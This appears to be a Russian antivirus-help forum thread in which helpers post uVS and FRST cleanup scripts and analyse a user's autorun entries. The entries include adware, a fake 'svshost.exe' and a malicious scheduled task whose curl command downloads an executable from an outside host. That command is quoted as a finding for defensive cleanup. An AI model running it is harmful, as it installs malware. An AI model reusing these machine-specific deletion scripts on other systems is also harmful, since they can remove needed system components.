+
Создайте образ автозапуска в uVS
http://forum.esetnod32.ru/forum9/topic2687/

Скопировать текст КОДА - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !


<code>

;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

deldirex %SystemDrive%\PROGRAM FILES (X86)\KINOROOM BROWSER

deldirex %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCALLOW\UNITY\WEBPLAY­ER\LOADER

deldirex %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\AMIGO\APPLICATIO­N\44.4.2403.3

deldirex %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\AMIGO\APPLICATIO­N

delref %SystemRoot%\SYSWOW64\WSAUDIO.DLL
del %SystemRoot%\SYSWOW64\WSAUDIO.DLL
delall %SystemRoot%\TEMP\CLEARCACHE.DLL
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DBGCIFLJFAPBHGIEHKJLCKFJMGEOJIJCB%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DJDFONANKHFNHIHDCPAAGPABBAOCLNJFP%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DLBJJFIIHGFEGNIOLCKPHPNFAOKDKBMDM%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DOELPKEPJLGMEHAJEHFEICFBJDIOBDKFJ%26INSTALLSOURCE%3D­ONDEMAND%26UC
delref %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\GOOGLE\CHROME\US­ER DATA\DEFAULT\EXTENSIONS\HANJIAJGNONAOBDLKLNCDJDMPBOMLHOA\3.2.9_0\MUSICSIG VKONTAKTE
delref %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\GOOGLE\CHROME\US­ER DATA\DEFAULT\EXTENSIONS\KCKNBENJNKKJKNPHMNIDANJIFBGPHJKE\4.18_0\THE SAFE SURFING
delref %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\GOOGLE\CHROME\US­ER DATA\DEFAULT\EXTENSIONS\MOFELBKEMHLIGELPMJMOHGPHHMOGBKNI\3.1.0_0\TEDDY PROTECTION
delref HTTP://MAIL.RU/CNT/10445?GP=802811
delref %SystemDrive%\USERS\АЛЕКСАНДР\APPDATA\LOCAL\YANDEX\YANDEXBRO­WSER\USER DATA\DEFAULT\EXTENSIONS\MOFELBKEMHLIGELPMJMOHGPHHMOGBKNI\3.1.0_0\TEDDY PROTECTION
delall %SystemDrive%\USERS\8523~1\APPDATA\LOCAL\TEMP\HYD43E3.TMP.1463815205\HTA\3RDPARTY\OCCOMSDK.DLL
delref HTTP://WWW.BING.COM/SEARCH?Q={SEARCHTERMS}&SRC=IE-SEARCHBOX&FORM=IESR02
delref HTTP://GO.MAIL.RU/DISTIB/EP/?Q={SEARCHTERMS}&PRODUCT_ID=%7B118B243E-C9FE-4202-83E3-CA2C7A15E7B2%7D&GP=802861
delref HTTP://WWW.MYPLAYCITY.RU/?UTM_SOURCE=STARTMENUDESKTOPLINK&UTM_MEDIUM=DOWNLOADABLE_WEBS­ITEICON
delref %SystemDrive%\PROGRAM FILES (X86)\QGNA\QGNA.EXE
delref %SystemDrive%\PROGRAMDATA\KRB UPDATER UTILITY\KRBUPDATER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\KINOROOM BROWSER\KRBROWSER.EXE
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\MACROMED\FLASH PLAYER\6D26FB13-6529-476D-8465-05D7C58C9E71\4BD4964E-C877-4B31-917A-BFA51A34E99F.EXE
delref {9F2B0085-9218-42A1-88B0-9F0E65851666}\[CLSID]
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {FE285C8C-5360-41C1-A700-045501C740DE}\[CLSID]
delref {9CDA66BE-3271-4723-8D35-DD834C58AD92}\[CLSID]
delref %SystemRoot%\SYSWOW64\MAPSTOASTTASK.DLL
delref %SystemRoot%\SYSWOW64\MAPSUPDATETASK.DLL
delref %SystemRoot%\EHOME\EHPRIVJOB.EXE
delref %SystemRoot%\EHOME\MCUPDATE
delref {23E5D772-327A-42F5-BDEE-C65C6796BB2A}\[CLSID]
delref %SystemRoot%\EHOME\MCUPDATE.EXE
delref {177AFECE-9599-46CF-90D7-68EC9EEB27B4}\[CLSID]
delref {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}\[CLSID]
delref {CEF51277-5358-477B-858C-4E14F0C80BF7}\[CLSID]
delref %SystemRoot%\EHOME\EHREC
delref {59116E30-02BD-4B84-BA1E-5D77E809B1A2}\[CLSID]
delref {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}\[CLSID]
delref {EA9155A3-8A39-40B4-8963-D3C761B18371}\[CLSID]
delref {DEF03232-9688-11E2-BE7F-B4B52FD966FF}\[CLSID]
delref %SystemRoot%\SYSWOW64\WPCUMI.DLL
delref %SystemRoot%\SYSWOW64\WPCMIG.DLL
delref {E51DFD48-AA36-4B45-BB52-E831F02E8316}\[CLSID]
delref {FF87090D-4A9A-4F47-879B-29A80C355D61}\[CLSID]
delref {45F26E9E-6199-477F-85DA-AF1EDFE067B1}\[CLSID]
delref {7CCA6768-8373-4D28-8876-83E8B4E3A969}\[CLSID]
delref %SystemRoot%\SYSWOW64\COMPMGMTLAUNCHER.EXE
delref %SystemRoot%\SYSWOW64\PEERDISTSVC.DLL
delref %SystemRoot%\SYSWOW64\APPVETWCLIENTRES.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\MRXSMB.SYS
delref %SystemRoot%\SYSWOW64\W32TIME.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\NDIS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\USBXHCI.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SRV2.SYS
delref %SystemRoot%\SYSWOW64\RDPCORETS.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\HTTP.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\WINNAT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\TCPIP.SYS
delref %SystemRoot%\SYSWOW64\UMPOEXT.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\DMVSC.SYS
delref %SystemRoot%\SYSWOW64\IPHLPSVC.DLL
delref %SystemRoot%\SYSWOW64\CSCSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\VMBKMCL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\REFS.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\SPACEPORT.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\FVEVOL.SYS
delref %SystemRoot%\SYSWOW64\DRIVERS\AFD.SYS
delref %SystemRoot%\SYSWOW64\PNRPSVC.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\PACER.SYS
delref %SystemRoot%\SYSWOW64\HVHOSTSVC.DLL
delref %SystemRoot%\SYSWOW64\LSM.DLL
delref %SystemRoot%\SYSWOW64\DRIVERS\SYNTH3DVSC.SYS
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {19916E01-B44E-4E31-94A4-4696DF46157B}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref %SystemDrive%\PROGRA~2\BATTLE~1\SONAR\070~1.4\SONARAX.OCX
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref {E0DD6CAB-2D10-11D2-8F1A-0000F87ABD16}\[CLSID]
delref %SystemRoot%\SYSWOW64\BLANK.HTM
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref {6B9228DA-9C15-419E-856C-19E768A13BDC}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref {503739D0-4C5E-4CFD-B3BA-D881334F0DF2}\[CLSID]
delref %Sys32%\DRIVERS\IUSB3XHC.SYS
delref %Sys32%\ALTTAB.DLL
delref %Sys32%\GWX\GWX.EXE
delref %Sys32%\DRIVERS\IUSB3HUB.SYS
delref %Sys32%\QAGENTRT.DLL
delref %Sys32%\LOCATIONNOTIFICATIONS.EXE
delref %SystemDrive%\PROGRAM FILES\WINDOWS MEDIA PLAYER\WMPDMCCORE.DLL
delref %Sys32%\MCXDRIV.DLL
delref %Sys32%\HOTSTARTUSERAGENT.DLL
delref %Sys32%\DRIVERS\RDPWD.SYS
delref %SystemDrive%\PROGRAM FILES\INTERNET EXPLORER\IEDVTOOL.DLL
delref %Sys32%\P2PHOST.EXE
delref %Sys32%\NAPIPSEC.DLL
delref %Sys32%\OCSETUP.EXE
delref %Sys32%\MSSHA.DLL
delref %Sys32%\APILOGEN.DLL
delref %Sys32%\IPBUSENUM.DLL
delref %Sys32%\DRIVERS\SCMDISK0101.SYS
delref %Sys32%\OOBE\MSOOBEUI.DLL
delref %Sys32%\MCTADMIN.EXE
delref %SystemDrive%\PROGRAM FILES\WINDOWS SIDEBAR\SIDEBAR.EXE
delref %Sys32%\DHCPQEC.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\WWANADVUI.DLL
delref %Sys32%\DSHOWRDPFILTER.DLL
delref %SystemRoot%\INF\UNREGMP2.EXE
delref %Sys32%\BLANK.HTM
delref HELPSVC\[SERVICE]
delref SACSVR\[SERVICE]
delref TBS\[SERVICE]
delref VMMS\[SERVICE]
delref MESSENGER\[SERVICE]
delref %Sys32%\DRIVERS\RDPENCDD.SYS
delref RDSESSMGR\[SERVICE]
delref %Sys32%\DRIVERS\SMARTCARDSIMULATOR.SYS
delref %Sys32%\DRIVERS\VIRTUALSMARTCARDREADER.SYS
delref %Sys32%\DRIVERS\WUDFUSBCCIDDRIVER.SYS
delref %Sys32%\PSXSS.EXE
delref D:\BLENDER\BLENDTHUMB64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE_64.DLL
delref %Sys32%\TETHERINGSETTINGHANDLER.DLL
delref %Sys32%\WBEM\WEMSAL_WMIPROVIDER (1).DLL
delref %Sys32%\QUICKACTIONSPS.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES\ADOBE\ADOBE PHOTOSHOP CC 2015\PHOTOSHOP.EXE\AUTOMATION
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
delref %Sys32%\CHTADVANCEDDS.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO360.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.26.9\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SPEECHRUNTIME.EXE
delref %SystemRoot%\SYSWOW64\TAPILUA.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\LOCATIONFRAMEWORK.DLL
delref %SystemRoot%\SYSWOW64\MAPSBTSVCPROXY.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\PERCEPTIONSIMULATIONEXTENSIONS.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\AUTHHOST.EXE
delref %SystemRoot%\SYSWOW64\EAPPCFGUI.DLL
delref %SystemRoot%\SYSWOW64\MAPSCSP.DLL
delref %SystemRoot%\SYSWOW64\RSTRUI.EXE
delref %SystemRoot%\SYSWOW64\LISTSVC.DLL
delref %SystemRoot%\SYSWOW64\AUTHHOSTPROXY.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\OVERWOLF\0.88.101.0\OVERWOLFTSHELPER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\WBEM\NLMCIM.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.28.13\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\ADOBE\ACROBAT READER DC\ACRORD32INFO.EXE
delref %SystemRoot%\SYSWOW64\SPEECH_ONECORE\COMMON\SAPI_EXTENSIONS.DLL
delref %SystemRoot%\SYSWOW64\SMARTSCREEN.EXE
delref %SystemRoot%\SYSWOW64\GPSVC.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\OOVOO\OOVOO.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\IDLISTEN.DLL
delref %SystemRoot%\SYSWOW64\WIFICONFIGSP.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\SYSTEM\OLE DB\MSDAORA.DLL
delref %SystemRoot%\SYSWOW64\INETSRV\IISRSTAS.EXE
delref %SystemDrive%\GAMES\WORLD_OF_TANKS\WARGAMINGGAMEUPDATER.EXE
delref D:\GAMES\WORLD_OF_TANKS\WARGAMINGGAMEUPDATER.EXE
delref {5A8FF410-F3CE-4844-B31B-F18D911239E8}\[CLSID]
delref {7AEFE841-DCA1-4A95-80CB-BE935D020300}\[CLSID]
delref %SystemRoot%\SYSWOW64\IHCTRL32.DLL
del %SystemRoot%\SYSWOW64\IHCTRL32.DLL
deltmp
restart


</code>

+
Далее (даже если проблема решена) выполните лог программой Malwarebytes
http://forum.esetnod32.ru/forum9/topic10688/

Выберите вариант сканирования: Быстрое или Полное сканирование.
Отчет предоставить для анализа ( в своей теме на форуме ).
Отчёт нужно предоставить в .txt ( блокнот )

ВЛАДИМИР ЯРЦЕВ

Думаю, что нужно посмотреть состояние самой системы.
Создайте образ автозапуска в uVS
http://forum.esetnod32.ru/forum9/topic2687/

Можно в планировщике отключить задачи на обновление создав одну - например проверять каждые 60 минут.

1) Системное время не  сбилось ?
2) Проблем со связью нет - низкая скорость например...

Вячеслав Букас

Кто лучше оценивает ситуацию
Вы или я ?
Mail.ru-агент - а кто его трогал ?

Amigo - нет в системе ( есть ведущие в никуда ярлыки )
HASPLMS.EXE   - Файла нет в системе.
ACRORD32INFO.EXE - Файла нет в системе.
Zona ( см. пункт 3 )

ADGUARD - часто источник проблем.
Если он нужен то _ после_ того как проблема решена его ровно 5 минут переустановить.


____________________
1)  
Полное имя                  HTTP://AMTOMIL.RU/F.EXE
Имя файла                   HTTP://AMTOMIL.RU/F.EXE
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                           
Доп. информация             на момент обновления списка
CmdLine                     -F -L "HTTP://AMTOMIL.RU/F.EXE" -O "C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\CURL\CURL.EXE"
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\CURL
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Roaming\curl\curl_7_54.exe" -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Дмитрий\AppData\Roaming\curl\curl.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6B7F9B0-7F11-4A76-901A-E9AD930612DE}\

_____________________
2) Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SVSHOST\SVSHOST.EXE
Имя файла                   SVSHOST.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

                           
Сохраненная информация      на момент создания образа
Статус                      ПОДОЗРИТЕЛЬНЫЙ в автозапуске
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                           
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла               Типичен для вирусов и троянов
Имя файла                   Имя файла слишком похоже на имя известного модуля SVCHOST.EXE
                           
Доп. информация             на момент обновления списка
CmdLine                     --STID="14712"
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\SVSHOST
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Local\svshost\svshost.exe" --stid="14712"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A612A43-201F-4756-9F69-0E0E7482EFE4}\

3) ZONA = potentially unwanted

Полное имя                  C:\PROGRAM FILES (X86)\ZONA\ZONA.EXE
Имя файла                   ZONA.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ [Запускался неявно или вручную]
                           
www.virustotal.com          2017-07-06
K7GW                        Unwanted-Program ( 005009ce1 )
K7AntiVirus                 Unwanted-Program ( 005009ce1 )
DrWeb                       Program.Zona.86
Endgame                     malicious (moderate confidence)
ESET-NOD32                  a variant of Win32/ZvuZona.I potentially unwanted
                           
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ [Запускался неявно или вручную]
File_Id                     579897981A5000
Linker                      10.0
Размер                      1710256 байт
Создан                      08.03.2017 в 23:19:24
Изменен                     08.03.2017 в 23:19:24
                           
TimeStamp                   27.07.2016 в 11:14:32
EntryPoint                  +
OS Version                  5.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано "Chetvertoe pokolenie, OOO"
                           
Версия файла                1.0.7.6
Описание                    Zona
Производитель               4th generation
                           
Доп. информация             на момент обновления списка
SHA1                        0A9C80026F31DBEED9C29D681EC09432803F3022
MD5                         3264D23F1998FB7EE67F78B796D78840
                           
Ссылки на объект            
SHORTCUT                    C:\USERS\ДМИТРИЙ\DESKTOP\Zona.lnk
SHORTCUT                    C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\Zona.lnk
                           

4)
Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\LOCAL\SEARCHGO\SEARCHGO.EXE
Имя файла                   SEARCHGO.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2017-07-06

Kaspersky                 AdWare.Win32.Searchgo.n

DrWeb                       Trojan.LoadMoney.2303

Microsoft                   Adware:Win32/Searchgo

ESET-NOD32              a variant of Win32/Adware.SearchGo.B


Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     592FF79B6F000
Linker                      12.0
Размер                      431320 байт
Создан                      05.07.2017 в 19:24:46
Изменен                     05.07.2017 в 19:27:28
                           
TimeStamp                   01.06.2017 в 11:16:43
EntryPoint                  +
OS Version                  5.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано "OOO ""Meti-Vostok"""
                           
Версия файла                1.0.0.278
Описание                    Searchgo component
Производитель               Searchgo
                           
Доп. информация             на момент обновления списка
SHA1                        A388241E2682E77F40250B32383DAB1BDB15BE59
MD5                         49E0AF2C4D0870B3187669D61FA65415
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\SEARCHGO TASK
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Local\SearchGo\searchgo.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D3D1CBA2-41A6-4845-BBF8-CFC76D274166}\

5)
Полное имя                  C:\USERS\ДМИТРИЙ\APPDATA\ROAMING\MICROSOFT\MSI.EXE
Имя файла                   MSI.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2017-07-05

Kaspersky                   UDS:DangerousObject.Multi.Generic

DrWeb                       Trojan.LoadMoney.2399

Avira                       TR/Crypt.ZPACK.Gen

                           

Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     595CDBA9282000
Linker                      6.0
Размер                      2634720 байт
Создан                      05.07.2017 в 19:18:36
Изменен                     05.07.2017 в 19:22:13
Атрибуты                    СКРЫТЫЙ  СИСТЕМНЫЙ  R/O  
                           
TimeStamp                   05.07.2017 в 12:29:29
EntryPoint                  +
OS Version                  4.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано LLC KORE
                           
Доп. информация             на момент обновления списка
CmdLine                     CNT=1 FTS="KMS-AKTIVATOR__OODFELLO\KMS-AKTIVATOR__OODFELLO.EXE"
SHA1                        12E8C0F40502E8C6B19720BE0E1761B07B16E8D7
MD5                         149F40495F4BE3BB3179D11067949B1D
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MSI
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA332735-3D52-4563-BB36-576F3352295F}\Actions
Actions                     "C:\Users\Дмитрий\AppData\Roaming\Microsoft\msi.exe" cnt=1 fts="kms-aktivator__oodfello\kms-aktivator__oodfello.exe"
                           
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CA332735-3D52-4563-BB36-576F3352295F}\
                           

6) C:\WINDOWS\SYSTEM32\EA3HOST.EXE
Kaspersky  not-a-virus:RiskTool.Win32.Agent.aojt
DrWeb  Trojan.LoadMoney.2356                    
_________
И помимо этого мусор от:
KINGOSOFT
и т.д.

В системе было много лишнего в том числе и рекламные агенты.
для нормальной работы требовалась очистка.

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
...
Запустите FRST и нажмите один раз на кнопку Fix и подождите.

[code]

ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers01: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers03: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers04: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers05: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
ContextMenuHandlers06: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - \Microsoft\Windows\EDP\EDP App Launch Task -> No File <==== ATTENTION
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - \Microsoft\Windows\EDP\EDP Auth Task -> No File <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION
OPR Extension: (No Name) - C:\Users\Дмитрий\AppData\Roaming\Opera Software\Opera Stable\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-07-05]

EmptyTemp:
Reboot:
[/code]
Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Проверяем, как работает система...

загрузите систему в безопасном режиме и проведите сканирование с очисткой.
Или зная путь ( который укажет антивирус )...
Пройти по этому пути.
Например: /system/app/
Найти файл и удалить его используя файловый менеджер.
Обновите все установленные программы.

1) В Malwarebytes - всё найденное удалите.
( поместите в карантин )

2) Выполните лог в AdwCleaner
http://forum.esetnod32.ru/forum9/topic7084/

после завершения сканирования:
Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой )
На вкладке:
Папки (Folders) для Mail.Ru  и Yandex снимите [V]


Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие
с автоперезагрузкой

3) Выполните FRST: http://forum.esetnod32.ru/forum9/topic2798/